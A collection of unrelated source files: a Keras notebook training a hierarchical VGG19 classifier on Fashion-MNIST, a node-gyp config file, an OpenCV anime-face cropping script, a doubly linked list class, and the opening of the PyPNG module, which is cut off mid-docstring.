"""VGG19HCNN.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/github/AdicherlaVenkataSai/H-CNNforfashionImageclassification/blob/master/VGG19HCNN.ipynb
"""
import keras
import numpy as np
import pickle
import os
from keras.models import Model
from keras.layers import Dense, Dropout, Activation, Flatten, Conv2D, MaxPooling2D, Input
from keras.initializers import he_normal
from keras import optimizers
from keras.callbacks import LearningRateScheduler, TensorBoard
from keras.layers.normalization import BatchNormalization
from keras.utils.data_utils import get_file
from keras.utils import to_categorical
from keras import backend as K
def scheduler(epoch):
learning_rate_init = 0.001
if epoch > 42:
learning_rate_init = 0.0002
if epoch > 52:
learning_rate_init = 0.00005
return learning_rate_init
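# The schedule above keeps the learning rate at 0.001 for epochs 0-42, drops
# it to 0.0002 for epochs 43-52, and to 0.00005 from epoch 53 onwards.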
def unpickle(filename, data_dir='.'):
    # NOTE: `data_dir` was used but never defined in the original notebook;
    # it is exposed here as a parameter (defaulting to the current directory).
    file = os.path.join(data_dir, filename)
    with open(file, 'rb') as fo:
        dict = pickle.load(fo, encoding='bytes')
    return dict
class LossWeightsModifier(keras.callbacks.Callback):
def __init__(self, alpha, beta, gamma):
self.alpha = alpha
self.beta = beta
self.gamma = gamma
# customize your behavior
def on_epoch_end(self, epoch, logs={}):
if epoch == 15:
K.set_value(self.alpha, 0.1)
K.set_value(self.beta, 0.8)
K.set_value(self.gamma, 0.1)
if epoch == 25:
K.set_value(self.alpha, 0.1)
K.set_value(self.beta, 0.2)
K.set_value(self.gamma, 0.7)
if epoch == 35:
K.set_value(self.alpha, 0)
K.set_value(self.beta, 0)
K.set_value(self.gamma, 1)
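# The callback above shifts the loss weighting from the coarse-1 head
# (alpha starts at 0.98, see below) to the coarse-2 head (beta = 0.8 after
# epoch 15) and finally to the fine head (gamma = 1 from epoch 35 on), so the
# network is trained on coarse labels first and fine labels last.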
height, width = 28, 28
channel = 1
if K.image_data_format() == 'channels_first':
input_shape = (channel, height, width)
else:
input_shape = (height, width, channel)
train_size = 60000
test_size = 10000
coarse1_classes = 2
coarse2_classes = 6
num_classes = 10
batch_size = 128
epochs = 60
log_filepath = './tb_log_vgg19_hierarchy_dynamic/'
weights_store_filepath = './vgg19_weights_hierarchy_dynamic/'
retrain_id = '101'
model_name = 'weights_vgg16_fashionmnist'+retrain_id+'.h5'
model_path = os.path.join(weights_store_filepath, model_name)
WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_tf_dim_ordering_tf_kernels.h5'
weights_path = get_file('vgg19_weights_tf_dim_ordering_tf_kernels.h5',
WEIGHTS_PATH,
cache_subdir='models')
(train_images, train_labels), (test_images, test_labels) = keras.datasets.fashion_mnist.load_data()
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
class_names_c1 = ['Clothes', 'Goods']
class_names_c2 = ['Tops', 'Bottoms', 'Dresses', 'Outers', 'Accessories', 'Shoes']
c2_to_c1 = {0:0, 1:0, 2:0, 3:0, 4:1, 5:1}
fine_to_c2 = {0:0, 1:1, 2:0, 3:2, 4:3, 5:5, 6:0, 7:5, 8:4, 9:5}
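# fine_to_c2 maps the 10 Fashion-MNIST fine labels onto the 6 coarse-2 groups
# (e.g. T-shirt/top, Pullover and Shirt -> Tops; Bag -> Accessories), and
# c2_to_c1 folds those groups into the 2 coarse-1 classes Clothes and Goods.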
def print_mappings(mapping, source, dest):
for k,v in mapping.items():
print(source[k], "->", dest[v])
print_mappings(c2_to_c1, class_names_c2, class_names_c1)
print("-"*10)
print_mappings(fine_to_c2, class_names, class_names_c2)
train_images.shape
train_labels_fine = to_categorical(train_labels)
train_labels_fine.shape
test_labels_fine = to_categorical(test_labels)
test_labels_fine.shape
train_labels_c2_index = [fine_to_c2[i] for i in train_labels]
train_labels_c2 = to_categorical(train_labels_c2_index)
train_labels_c2.shape
test_labels_c2_index = [fine_to_c2[i] for i in test_labels]
test_labels_c2 = to_categorical(test_labels_c2_index)
test_labels_c2.shape
train_labels_c1_index = [c2_to_c1[i] for i in train_labels_c2_index]
train_labels_c1 = to_categorical(train_labels_c1_index)
train_labels_c1.shape
test_labels_c1_index = [c2_to_c1[i] for i in test_labels_c2_index]
test_labels_c1 = to_categorical(test_labels_c1_index)
test_labels_c1.shape
x_train = train_images[..., np.newaxis]
x_test = test_images[..., np.newaxis]
y_train = train_labels_fine
y_test = test_labels_fine
y_c1_train = train_labels_c1
y_c1_test = test_labels_c1
y_c2_train = train_labels_c2
y_c2_test = test_labels_c2
print("x_train shape: ", x_train.shape)
print("x_test shape: ", x_test.shape)
print("y_train shape: ", y_train.shape)
print("y_test shape: ", y_test.shape)
print("y_c1_train shape: ", y_c1_train.shape)
print("y_c1_test shape: ", y_c1_test.shape)
print("y_c2_train shape: ", y_c2_train.shape)
print("y_c2_test shape: ", y_c2_test.shape)
alpha = K.variable(value=0.98, dtype="float32", name="alpha")
beta = K.variable(value=0.01, dtype="float32", name="beta")
gamma = K.variable(value=0.01, dtype="float32", name="gamma")
img_input = Input(shape=input_shape, name='input')
img_input
#block 1
x = Conv2D(64, (3, 3), activation='relu', padding='same')(img_input)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
#block 2
x = Conv2D(128, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
#coarse 1
c_1_bch = Flatten(name='c1_flatten')(x)
c_1_bch = Dense(256, activation='relu')(c_1_bch)
c_1_bch = BatchNormalization()(c_1_bch)
c_1_bch = Dropout(0.5)(c_1_bch)
c_1_bch = Dense(256, activation='relu')(c_1_bch)
c_1_bch = BatchNormalization()(c_1_bch)
c_1_bch = Dropout(0.5)(c_1_bch)
c_1_pred = Dense(coarse1_classes, activation='softmax')(c_1_bch)
#block 3
x = Conv2D(256, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
#coarse 2
c_2_bch = Flatten(name='c2_flatten')(x)
c_2_bch = Dense(1024, activation='relu')(c_2_bch)
c_2_bch = BatchNormalization()(c_2_bch)
c_2_bch = Dropout(0.5)(c_2_bch)
c_2_bch = Dense(1024, activation='relu')(c_2_bch)
c_2_bch = BatchNormalization()(c_2_bch)
c_2_bch = Dropout(0.5)(c_2_bch)
c_2_pred = Dense(coarse2_classes, activation='softmax')(c_2_bch)
#block 4
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
#block 5
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
#fine
x = Flatten(name='flatten')(x)
x = Dense(4096, activation='relu')(x)
x = BatchNormalization()(x)
x = Dropout(0.5)(x)
x = Dense(4096, activation='relu')(x)
x = BatchNormalization()(x)
x = Dropout(0.5)(x)
fine_pred = Dense(num_classes, activation='softmax')(x)
model = Model(img_input, [c_1_pred, c_2_pred, fine_pred], name='vgg19_hierarchy')
model.summary()
sgd = optimizers.SGD(lr=0.001, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=sgd,
loss_weights=[alpha, beta, gamma],
# optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
tb_cb = TensorBoard(log_dir=log_filepath, histogram_freq=0)
change_lr = LearningRateScheduler(scheduler)
change_lw = LossWeightsModifier(alpha, beta, gamma)
cbks = [change_lr, tb_cb, change_lw]
history = model.fit(x_train, [y_c1_train, y_c2_train, y_train],
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=cbks,
validation_data=(x_test, [y_c1_test, y_c2_test, y_test]))
'''model.compile(loss=keras.losses.categorical_crossentropy,
# optimizer=keras.optimizers.Adadelta(),
optimizer=sgd,
metrics=['accuracy'])'''
#model.save(model_path)
score = model.evaluate(x_test, [y_c1_test, y_c2_test, y_test], verbose=0)
print('score is: ', score)
# Commented out IPython magic to ensure Python compatibility.
# plot the loss and accuracy
import matplotlib.pyplot as plt
# %matplotlib inline
loss = history.history['loss']
dense_3_loss = history.history['dense_3_loss']
dense_6_loss = history.history['dense_6_loss']
dense_9_loss = history.history['dense_9_loss']
dense_3_accuracy = history.history['dense_3_accuracy']
dense_6_accuracy = history.history['dense_6_accuracy']
dense_9_accuracy = history.history['dense_9_accuracy']
val_loss = history.history['val_loss']
val_dense_3_loss = history.history['val_dense_3_loss']
val_dense_6_loss = history.history['val_dense_6_loss']
val_dense_9_loss = history.history['val_dense_9_loss']
val_dense_3_accuracy = history.history['val_dense_3_accuracy']
val_dense_6_accuracy = history.history['val_dense_6_accuracy']
val_dense_9_accuracy = history.history['val_dense_9_accuracy']
# Use one x value per recorded epoch so the lengths match the history lists
epochs = range(1, len(loss) + 1)
plt.title('Training and validation accuracy')
plt.plot(epochs, dense_3_accuracy, 'red', label='Training C1 accuracy')
plt.plot(epochs, dense_6_accuracy, 'blue', label='Training C2 accuracy')
plt.plot(epochs, dense_9_accuracy, 'green', label='Training F accuracy')
plt.plot(epochs, val_dense_3_accuracy, 'yellow', label='Validation C1 accuracy')
plt.plot(epochs, val_dense_6_accuracy, 'violet', label='Validation C2 accuracy')
plt.plot(epochs, val_dense_9_accuracy, 'gray', label='Validation F accuracy')
plt.legend()
plt.figure()
plt.title('Training and validation loss')
plt.plot(epochs, dense_3_loss, 'red', label='Training C1 loss')
plt.plot(epochs, dense_6_loss, 'blue', label='Training C2 loss')
plt.plot(epochs, dense_9_loss, 'green', label='Training F loss')
plt.plot(epochs, val_dense_3_loss, 'yellow', label='Validation C1 loss')
plt.plot(epochs, val_dense_6_loss, 'violet', label='Validation C2 loss')
plt.plot(epochs, val_dense_9_loss, 'gray', label='Validation F loss')
plt.legend()
plt.show()
# =============================================================================
# File: /node_modules/socket.io/node_modules/engine.io/node_modules/uws/build/config.gypi
# Repo: rcmeng1q84/LeapWatch  (licenses: Zlib, MIT)
# =============================================================================
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"host_arch": "x64",
"icu_data_file": "icudt56l.dat",
"icu_data_in": "../../deps/icu/source/data/in/icudt56l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "./deps/icu",
"icu_small": "true",
"icu_ver_major": "56",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/RC/.node-gyp/4.5.0",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/zsh",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"npat": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"spin": "true",
"cache_lock_retries": "10",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"access": "",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/RC/.npm-init.js",
"userconfig": "/Users/RC/.npmrc",
"node_version": "4.5.0",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/RC/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/2.15.9 node/v4.5.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "1.0.0",
"umask": "0022",
"git": "git",
"init_author_name": "",
"scope": "",
"onload_script": "",
"tmp": "/var/folders/_4/wydw9sw51cq1116mg59p1_m80000gn/T",
"unsafe_perm": "true",
"link": "",
"prefix": "/usr/local"
}
}
# =============================================================================
# File: /test.py
# Repo: savslug/anime_face  (no license)
# =============================================================================
def extract_faces(images_dir, export_dir='faces'):
"""
与えられたパスの画像からアニメの顔を抽出
facesディレクトリに顔部分を出力
"""
import os
import cv2
import glob
from tqdm import tqdm
    # Build the classifier from the cascade feature file
    classifier = cv2.CascadeClassifier('lbpcascade_animeface.xml')
    # Create the output directory
output_dir = export_dir
if not os.path.exists(output_dir):
os.makedirs(output_dir)
for image_path in tqdm(glob.glob(images_dir + '/*')):
# print(image_path)
        # Detect faces
image = cv2.imread(image_path)
        # Convert to greyscale to speed up detection
gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = classifier.detectMultiScale(gray_image)
# print(faces)
for i, (x, y, w, h) in enumerate(faces):
            # Crop out each detected face
face_image = image[y:y + h, x:x + w]
output_path = os.path.join(
output_dir, image_path[len(images_dir) + 1:] + '{0}.jpg'.format(i))
print(output_path)
cv2.imwrite(output_path, face_image)
#cv2.imwrite('face.jpg', image)
    return
    # NOTE: the block below is unreachable (it follows the `return` above) and
    # looks like leftover debugging code that draws boxes around the faces.
    for x, y, w, h in faces:
        # Draw a rectangle around the detected face
        cv2.rectangle(image, (x, y), (x + w, y + h),
                      color=(0, 0, 255), thickness=3)
    cv2.imwrite('faces.jpg', image)
extract_faces('mov2image_dir')
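# Note: this script assumes lbpcascade_animeface.xml is present in the working
# directory; that cascade file is typically the one published in the
# nagadomi/lbpcascade_animeface repository.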
# =============================================================================
# File: /mangagrabber/src/mailers/__init__.py
# Repo: donald-cl/mangagrabber  (no license)
# =============================================================================
from mailers.mail import *
# =============================================================================
# File: /data-structures/TwoWayLinkedList.py
# Repo: KyattPL/algorithms-and-data-structures  (no license)
# =============================================================================
# With Head and Tail
class TwoWayLinkedList:
class Element:
def __init__(self, val):
self.value = val
self.next = None
self.previous = None
def __init__(self):
self.head = None
self.tail = None
def push(self, val):
if self.head is None:
newElem = self.Element(val)
self.head = newElem
self.tail = newElem
else:
newElem = self.Element(val)
self.tail.next = newElem
newElem.previous = self.tail
self.tail = newElem
def print_list(self):
elem = self.head
if elem is None:
return
else:
while elem != self.tail:
print(elem.value)
elem = elem.next
print(self.tail.value)
def print_reverse(self):
elem = self.tail
if elem is None:
return
else:
while elem != self.head:
print(elem.value)
elem = elem.previous
print(self.head.value)
    def pop(self):
        elem = self.tail
        if elem is None:
            return None
        else:
            newTail = elem.previous
            val = elem.value
            self.tail = newTail
            if newTail is None:
                # The list is now empty; head must not keep pointing at
                # the popped element
                self.head = None
            else:
                # Detach the popped element from its predecessor
                newTail.next = None
            return val
def contains(self, val):
elem = self.head
if elem is None:
return False
else:
while elem:
if elem.value == val:
return True
else:
elem = elem.next
return False
def length(self):
count = 0
elem = self.head
if elem is None:
return 0
else:
while elem:
count += 1
elem = elem.next
return count
def add(self, val, index):
if index < 0 or index >= self.length():
return None
else:
if index == 0:
elem = self.head
newElem = self.Element(val)
newElem.next = elem
elem.previous = newElem
self.head = newElem
return
else:
elem = self.head
ind = 1
while ind != index:
ind += 1
elem = elem.next
newElem = self.Element(val)
if elem.next:
newElem.next = elem.next
newElem.previous = elem
elem.next.previous = newElem
elem.next = newElem
else:
newElem.next = None
newElem.previous = elem
elem.next = newElem
def remove(self, index):
if index < 0 or index >= self.length():
return None
else:
            if index == 0:
                elem = self.head
                val = elem.value
                self.head = elem.next
                if self.head is None:
                    self.tail = None
                else:
                    # The new head no longer has a predecessor
                    self.head.previous = None
                return val
else:
elem = self.head
ind = 0
while ind != index:
ind += 1
elem = elem.next
if self.tail != elem:
val = elem.value
elem.previous.next = elem.next
elem.next.previous = elem.previous
return val
else:
val = elem.value
elem.previous.next = None
self.tail = elem.previous
return val
if __name__ == "__main__":
x = TwoWayLinkedList()
x.push(3)
x.push(69)
x.push(2137)
print(x.contains(69))
print(x.length())
x.print_list()
x.add(32, 1)
x.print_list()
x.remove(3)
x.print_list()
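# Expected console output of the demo above, for reference:
#   True
#   3
#   3, 69, 2137          (print_list, one value per line)
#   3, 32, 69, 2137      (after add(32, 1))
#   3, 32, 69            (after remove(3))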
# =============================================================================
# File: /tools/pokemontools/png.py
# Repo: Neos21/pokegold  (no license)
# =============================================================================
#!/usr/bin/env python
from __future__ import print_function
# png.py - PNG encoder/decoder in pure Python
#
# Copyright (C) 2006 Johann C. Rocholl <johann@browsershots.org>
# Portions Copyright (C) 2009 David Jones <drj@pobox.com>
# And probably portions Copyright (C) 2006 Nicko van Someren <nicko@nicko.org>
#
# Original concept by Johann C. Rocholl.
#
# LICENCE (MIT)
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Pure Python PNG Reader/Writer
This Python module implements support for PNG images (see PNG
specification at http://www.w3.org/TR/2003/REC-PNG-20031110/ ). It reads
and writes PNG files with all allowable bit depths
(1/2/4/8/16/24/32/48/64 bits per pixel) and colour combinations:
greyscale (1/2/4/8/16 bit); RGB, RGBA, LA (greyscale with alpha) with
8/16 bits per channel; colour mapped images (1/2/4/8 bit).
Adam7 interlacing is supported for reading and
writing. A number of optional chunks can be specified (when writing)
and understood (when reading): ``tRNS``, ``bKGD``, ``gAMA``.
For help, type ``import png; help(png)`` in your python interpreter.
A good place to start is the :class:`Reader` and :class:`Writer`
classes.
Requires Python 2.3. Limited support is available for Python 2.2, but
not everything works. Best with Python 2.4 and higher. Installation is
trivial, but see the ``README.txt`` file (with the source distribution)
for details.
This file can also be used as a command-line utility to convert
`Netpbm <http://netpbm.sourceforge.net/>`_ PNM files to PNG, and the
reverse conversion from PNG to PNM. The interface is similar to that
of the ``pnmtopng`` program from Netpbm. Type ``python png.py --help``
at the shell prompt for usage and a list of options.
A note on spelling and terminology
----------------------------------
Generally British English spelling is used in the documentation. So
that's "greyscale" and "colour". This not only matches the author's
native language, it's also used by the PNG specification.
The major colour models supported by PNG (and hence by PyPNG) are:
greyscale, RGB, greyscale--alpha, RGB--alpha. These are sometimes
referred to using the abbreviations: L, RGB, LA, RGBA. In this case
each letter abbreviates a single channel: *L* is for Luminance or Luma
or Lightness which is the channel used in greyscale images; *R*, *G*,
*B* stand for Red, Green, Blue, the components of a colour image; *A*
stands for Alpha, the opacity channel (used for transparency effects,
but higher values are more opaque, so it makes sense to call it
opacity).
A note on formats
-----------------
When getting pixel data out of this module (reading) and presenting
data to this module (writing) there are a number of ways the data could
be represented as a Python value. Generally this module uses one of
three formats called "flat row flat pixel", "boxed row flat pixel", and
"boxed row boxed pixel". Basically the concern is whether each pixel
and each row comes in its own little tuple (box), or not.
Consider an image that is 3 pixels wide by 2 pixels high, and each pixel
has RGB components:
Boxed row flat pixel::
list([R,G,B, R,G,B, R,G,B],
[R,G,B, R,G,B, R,G,B])
Each row appears as its own list, but the pixels are flattened so
that three values for one pixel simply follow the three values for
the previous pixel. This is the most common format used, because it
provides a good compromise between space and convenience. PyPNG regards
itself as at liberty to replace any sequence type with any sufficiently
compatible other sequence type; in practice each row is an array (from
the array module), and the outer list is sometimes an iterator rather
than an explicit list (so that streaming is possible).
Flat row flat pixel::
[R,G,B, R,G,B, R,G,B,
R,G,B, R,G,B, R,G,B]
The entire image is one single giant sequence of colour values.
Generally an array will be used (to save space), not a list.
Boxed row boxed pixel::
list([ (R,G,B), (R,G,B), (R,G,B) ],
[ (R,G,B), (R,G,B), (R,G,B) ])
Each row appears in its own list, but each pixel also appears in its own
tuple. A serious memory burn in Python.
In all cases the top row comes first, and for each row the pixels are
ordered from left-to-right. Within a pixel the values appear in the
order, R-G-B-A (or L-A for greyscale--alpha).
There is a fourth format, mentioned because it is used internally,
is close to what lies inside a PNG file itself, and has some support
from the public API. This format is called packed. When packed,
each row is a sequence of bytes (integers from 0 to 255), just as
it is before PNG scanline filtering is applied. When the bit depth
is 8 this is essentially the same as boxed row flat pixel; when the
bit depth is less than 8, several pixels are packed into each byte;
when the bit depth is 16 (the only value more than 8 that is supported
by the PNG image format) each pixel value is decomposed into 2 bytes
(and `packed` is a misnomer). This format is used by the
:meth:`Writer.write_packed` method. It isn't usually a convenient
format, but may be just right if the source data for the PNG image
comes from something that uses a similar format (for example, 1-bit
BMPs, or another PNG file).
And now, my famous members
--------------------------
"""
__version__ = "0.0.18"
import itertools
import math
# http://www.python.org/doc/2.4.4/lib/module-operator.html
import operator
import struct
import sys
# http://www.python.org/doc/2.4.4/lib/module-warnings.html
import warnings
import zlib
from array import array
from functools import reduce
try:
# `cpngfilters` is a Cython module: it must be compiled by
# Cython for this import to work.
# If this import does work, then it overrides pure-python
# filtering functions defined later in this file (see `class
# pngfilters`).
import cpngfilters as pngfilters
except ImportError:
pass
__all__ = ['Image', 'Reader', 'Writer', 'write_chunks', 'from_array']
# The PNG signature.
# http://www.w3.org/TR/PNG/#5PNG-file-signature
_signature = struct.pack('8B', 137, 80, 78, 71, 13, 10, 26, 10)
_adam7 = ((0, 0, 8, 8),
(4, 0, 8, 8),
(0, 4, 4, 8),
(2, 0, 4, 4),
(0, 2, 2, 4),
(1, 0, 2, 2),
(0, 1, 1, 2))
def group(s, n):
# See http://www.python.org/doc/2.6/library/functions.html#zip
return list(zip(*[iter(s)]*n))
def isarray(x):
return isinstance(x, array)
def tostring(row):
return row.tostring()
def interleave_planes(ipixels, apixels, ipsize, apsize):
"""
Interleave (colour) planes, e.g. RGB + A = RGBA.
Return an array of pixels consisting of the `ipsize` elements of
data from each pixel in `ipixels` followed by the `apsize` elements
of data from each pixel in `apixels`. Conventionally `ipixels`
and `apixels` are byte arrays so the sizes are bytes, but it
actually works with any arrays of the same type. The returned
array is the same type as the input arrays which should be the
same type as each other.
"""
itotal = len(ipixels)
atotal = len(apixels)
newtotal = itotal + atotal
newpsize = ipsize + apsize
# Set up the output buffer
# See http://www.python.org/doc/2.4.4/lib/module-array.html#l2h-1356
out = array(ipixels.typecode)
# It's annoying that there is no cheap way to set the array size :-(
out.extend(ipixels)
out.extend(apixels)
# Interleave in the pixel data
for i in range(ipsize):
out[i:newtotal:newpsize] = ipixels[i:itotal:ipsize]
for i in range(apsize):
out[i+ipsize:newtotal:newpsize] = apixels[i:atotal:apsize]
return out
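# Sketch of the interleaving above with two RGB pixels and two alpha values
# (symbolic names are placeholders):
#
#     interleave_planes(array('B', [R1,G1,B1, R2,G2,B2]),
#                       array('B', [A1, A2]), 3, 1)
#     # -> array('B', [R1,G1,B1,A1, R2,G2,B2,A2])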
def check_palette(palette):
"""Check a palette argument (to the :class:`Writer` class)
for validity. Returns the palette as a list if okay; raises an
exception otherwise.
"""
# None is the default and is allowed.
if palette is None:
return None
p = list(palette)
if not (0 < len(p) <= 256):
raise ValueError("a palette must have between 1 and 256 entries")
seen_triple = False
for i,t in enumerate(p):
if len(t) not in (3,4):
raise ValueError(
"palette entry %d: entries must be 3- or 4-tuples." % i)
if len(t) == 3:
seen_triple = True
if seen_triple and len(t) == 4:
raise ValueError(
"palette entry %d: all 4-tuples must precede all 3-tuples" % i)
for x in t:
if int(x) != x or not(0 <= x <= 255):
raise ValueError(
"palette entry %d: values must be integer: 0 <= x <= 255" % i)
return p
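# For example, [(255, 0, 0, 255), (0, 0, 0)] is accepted (the 4-tuple precedes
# the 3-tuple), whereas [(255, 0, 0), (0, 0, 0, 128)] raises ValueError.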
def check_sizes(size, width, height):
"""Check that these arguments, in supplied, are consistent.
Return a (width, height) pair.
"""
if not size:
return width, height
if len(size) != 2:
raise ValueError(
"size argument should be a pair (width, height)")
if width is not None and width != size[0]:
raise ValueError(
"size[0] (%r) and width (%r) should match when both are used."
% (size[0], width))
if height is not None and height != size[1]:
raise ValueError(
"size[1] (%r) and height (%r) should match when both are used."
% (size[1], height))
return size
def check_color(c, greyscale, which):
"""Checks that a colour argument for transparent or
background options is the right form. Returns the colour
    (which, if it's a bare integer, is "corrected" to a 1-tuple).
"""
if c is None:
return c
if greyscale:
try:
len(c)
except TypeError:
c = (c,)
if len(c) != 1:
raise ValueError("%s for greyscale must be 1-tuple" %
which)
if not isinteger(c[0]):
raise ValueError(
"%s colour for greyscale must be integer" % which)
else:
if not (len(c) == 3 and
isinteger(c[0]) and
isinteger(c[1]) and
isinteger(c[2])):
raise ValueError(
"%s colour must be a triple of integers" % which)
return c
class Error(Exception):
def __str__(self):
return self.__class__.__name__ + ': ' + ' '.join(self.args)
class FormatError(Error):
"""Problem with input file format. In other words, PNG file does
not conform to the specification in some way and is invalid.
"""
class ChunkError(FormatError):
pass
class Writer:
"""
PNG encoder in pure Python.
"""
def __init__(self, width=None, height=None,
size=None,
greyscale=False,
alpha=False,
bitdepth=8,
palette=None,
transparent=None,
background=None,
gamma=None,
compression=None,
interlace=False,
bytes_per_sample=None, # deprecated
planes=None,
colormap=None,
maxval=None,
chunk_limit=2**20,
x_pixels_per_unit = None,
y_pixels_per_unit = None,
unit_is_meter = False):
"""
Create a PNG encoder object.
Arguments:
width, height
Image size in pixels, as two separate arguments.
size
Image size (w,h) in pixels, as single argument.
greyscale
Input data is greyscale, not RGB.
alpha
Input data has alpha channel (RGBA or LA).
bitdepth
Bit depth: from 1 to 16.
palette
Create a palette for a colour mapped image (colour type 3).
transparent
Specify a transparent colour (create a ``tRNS`` chunk).
background
Specify a default background colour (create a ``bKGD`` chunk).
gamma
Specify a gamma value (create a ``gAMA`` chunk).
compression
zlib compression level: 0 (none) to 9 (more compressed);
default: -1 or None.
interlace
Create an interlaced image.
chunk_limit
Write multiple ``IDAT`` chunks to save memory.
x_pixels_per_unit
Number of pixels a unit along the x axis (write a
`pHYs` chunk).
y_pixels_per_unit
Number of pixels a unit along the y axis (write a
          `pHYs` chunk). Along with `x_pixels_per_unit`, this gives
the pixel size ratio.
unit_is_meter
`True` to indicate that the unit (for the `pHYs`
chunk) is metre.
The image size (in pixels) can be specified either by using the
`width` and `height` arguments, or with the single `size`
argument. If `size` is used it should be a pair (*width*,
*height*).
`greyscale` and `alpha` are booleans that specify whether
an image is greyscale (or colour), and whether it has an
alpha channel (or not).
`bitdepth` specifies the bit depth of the source pixel values.
Each source pixel value must be an integer between 0 and
``2**bitdepth-1``. For example, 8-bit images have values
between 0 and 255. PNG only stores images with bit depths of
1,2,4,8, or 16. When `bitdepth` is not one of these values,
the next highest valid bit depth is selected, and an ``sBIT``
(significant bits) chunk is generated that specifies the
original precision of the source image. In this case the
supplied pixel values will be rescaled to fit the range of
the selected bit depth.
The details of which bit depth / colour model combinations the
PNG file format supports directly, are somewhat arcane
(refer to the PNG specification for full details). Briefly:
